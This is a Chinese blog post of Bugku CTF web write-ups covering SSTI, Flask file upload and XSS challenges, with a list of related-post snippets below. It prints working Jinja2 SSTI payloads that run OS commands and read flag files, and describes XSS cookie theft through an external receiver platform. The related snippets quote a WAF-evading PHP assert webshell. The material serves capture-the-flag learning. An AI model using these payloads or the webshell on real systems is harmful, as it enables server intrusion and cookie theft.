Bugku Web专项(持续更新)

最新推荐文章于 2024-07-30 22:52:45 发布
最新推荐文章于 2024-07-30 22:52:45 发布
阅读量408 收藏 8
点赞数 7
分类专栏: bugku 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69065643/article/details/140804150
版权

Simple_SSTI_1

点击网址

访问网址,他让我们输入一个flag参数

我们查看页面源代码

他告诉我们有经常设置secret_key 变量

可以知道要传入一个名为flag的参数,又说我们经常设置一个secret_key

我们传入参数       /?flag={{config.SECRET_KEY}}

得到flag

Simple_SSTI_2

进入网址

和第一关一样,让我们输入一个flag参数,查看页面源代码

没有什么有用的信息,我们看一下config

信息太杂乱,我们查看 {{config.__class__.__init__.__globals__.['os'].popen('ls../').read()}}

外部应用的目录 在系统目录中还在最前面有点可疑我们查看app目录

{{config.__class__.__init__.__globals__['os'].popen('ls ../app').read()}}

查看flag文件  {{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read()}}

得到flag

Flask_FileUpload

点击连接

我们查看网页代码

他允许我们上传jpg/png图片,返回界面是python写的

我们编辑一个1.jpg内容为

上传

上传成功,我们查看网页代码

发现flag,再写一个22.jpg用来查看flag文件

上传,查看网页代码,得到flag

Bugku 留言板

访问网页,试一下能不能弹窗,发现不可以

题目提示我们不需要登录,需要xss平台接收,我们登录xss平台复制下图代码,发送到留言板中

成功留言

将返回的cookies进行url解码得到flag

Bugku 滑稽

访问网址,f12发现flag

养只小羊7
关注
专栏目录
bugkuWeb小白解法---持续更新!
qq_42906381的博客
03-30 779
bugkuWeb!安排本文持续更新1滑稽一脸2验证码3请求get4请求post5矛盾 本文持续更新 这是我第二次使用 Markdown编辑器 。我将用他来写出自己的第一篇CSDN博客! 1滑稽一脸 打开网页之后,按下F12进入开发人员工具 点击调试程序,手慢的我已经让滑稽停不下来了 但是不经意间看见有个播放键,点一下,滑稽停了下来 舒服多了 然后搜索flag找到key复制 2验证码 打开网页 F...
Bugku WEB shell
qq_41696858的博客
07-03 2172
1.打开场景,啥有没有,常规操作:查看源码,扫路径,抓包也是啥也没有 2.查看作者提示,送给大家一个过狗一句话 $poc=“a#s#s#e#r#t”; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 其实就是运用拼接过waf,最后的运行结果是assert($_GET[‘s’]) 很明显assert是能执行shell命令的危险
BUGKU-WEB 留言板
天泽岁月
02-07 1354
BUGKU-WEB 留言板
Bugku-web-留言板
qq_68457525的博客
06-20 525
ctf中关于xss跨站脚本漏洞的学习
BugKu:Web
qq_50034496的博客
07-30 2082
BugKu:Web
BugKu Web WriteUp
AlexYoung28的博客
08-24 2254
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
BugkuWeb系列(持续更新~~~)
m0_59151303的博客
07-30 256
打开环境在输入框输入答案发现只能输入一位数,那我们想到修改输入框内容长度,我们右击页面点击检查,找到输入框的代码修改长度为10。本题是POST传参,我们通过火狐浏览器的HackBar传入post参数,根据页面的代码我们传入一个what=flag。本题是GET传参,我们在url上传入参数,根据页面的代码我们传入一个what=flag,得到flag。我们右击页面点击检查,查看页面代码,得到flag。进入环境,出现一个弹窗,点击确实发现什么也没有。点击验证,弹出窗口,得到flag。打开环境,发现一段PHP代码。
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
BugkuCTF——最新web篇writeup(持续更新
1匹黑马
11-16 3887
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
Bugku WEB 都过滤了
qq_41696858的博客
07-25 814
这题呢,网上有很多解法,那都是这个题目没有完善之前的,现在来说已经修复的差不多了,像以前的直接/flag当然行不通,源码泄露啥的也被删了 严格来说,其实这是一道sql注入题 打开场景,啥提示没有,那就dirsearch扫一波,在一番查找过后,发现images文件夹下有一张图片,那就是作者给的提示,也就是不是数字开头的字符串在比较时会自动转成0 那么他的提示里0=0也就是永真,所以可以爆出所有的用户名 友情小tips:三个0异或不是1,而是0,不要想当然,这就是一个存粹的数学问题 最后一个式子给出了如何有条件
BugkuCTF Web
2201_75891821的博客
07-30 1785
Bug ku CTF web
【愚公系列】2023年06月 Bugku-Web留言板
时光隧道
06-23 7086
使用dirsearch进行目录爆破的步骤如下:下载dirsearch工具:可以从Github上下载dirsearch,或者使用命令行工具进行安装。打开dirsearch工具:在命令行中输入python3 dirsearch.py命令,即可打开dirsearch工具。设置目标URL:在命令行中输入目标URL,例如:python3 dirsearch.py -u http://example.com。
bugku-web-留言板
m0_57954651的博客
10-31 5134
获取cookie的js代码 (alert(document.cookie))
bugkuCTF
Vincent0sen的博客
10-26 507
有时间再说,持续更新
BugKu:留言板
m0_63944205的博客
07-30 283
看到输入框我们首先想到可能是sql注入或者是xss注入。
Bugku-留言板
qq_56611811的博客
05-07 853
1.提示我们用xss平台接收flag2.通过xss.pt平台生成脚本,以插入图片形式将图片地址上传 3.回到xss平台可以看到接收到flag4.URL解码一下,拿到flag
Bugku-备份是个好习惯
qq_43622442的博客
05-12 438
Bugku-备份是个好习惯 http://123.206.87.240:8002/web16/ 1.看到一串md5,解密发现: 2.暂时用不上,看源码,看题目意思,扫一下目录: 3.下载下来看一下: 4.
ctf bugku
weixin_51387754的博客
08-13 2264
bugkuSimple_SSTI_1社工-进阶收集Simple_SSTI_2Flask_FileUpload1和0的故事easy_nbt留言板瑞士军刀入门逆向滑稽canarytelnet眼见非实啊哒/.-聪明的小羊ok[+-<>] Simple_SSTI_1 查看源码 You need pass in a parameter named flag。 You know, in the flask, We often set a secret_key variable 您需要传入一个名为flag
bugku攻略
最新发布
qq_68186313的博客
07-30 782
alert(document.cookie)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值